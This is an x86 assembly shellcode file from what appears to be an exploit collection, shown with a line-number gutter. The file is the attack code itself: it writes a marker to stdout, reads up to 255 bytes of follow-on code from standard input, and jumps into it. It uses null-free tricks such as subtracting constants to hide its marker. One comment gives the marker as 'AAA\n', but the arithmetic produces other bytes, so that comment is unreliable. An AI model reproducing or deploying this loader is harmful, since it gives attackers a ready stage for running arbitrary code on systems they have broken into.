exploits/7350wurm/shellcode/write-read-exec.s


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

	.globl	cbegin
	.globl	cend

cbegin:

/* write: ebx = fd, ecx = where, edx = length, eax = 4 */
wr_pos:	xorl	%ebx, %ebx
	incl	%ebx		/* ebx = 1 */

	movl	$0x0b51740b, %eax
	subl	$0x01010101, %eax
	push	%eax
	movl	%esp, %ecx	/* ecx = "AAA\n" */

	push	$0x04
	pop	%eax		/* eax = 4 */
	movl	%eax, %edx

	int	$0x80		/* write (1, "AAA\n", 4) */

	jmp	ctramp
rd_cde:	xorl	%ebx, %ebx
	mull	%ebx		/* ebx = eax = edx = 0 */

	decb	%dl		/* edx = 0xff */
	popl	%ecx		/* ecx = ncode */

	push	$0x3
	pop	%eax

	int	$0x80		/* read (0, ncode, 0xff) */
	jmp	ncode

ctramp:	call	rd_cde
ncode:

cend: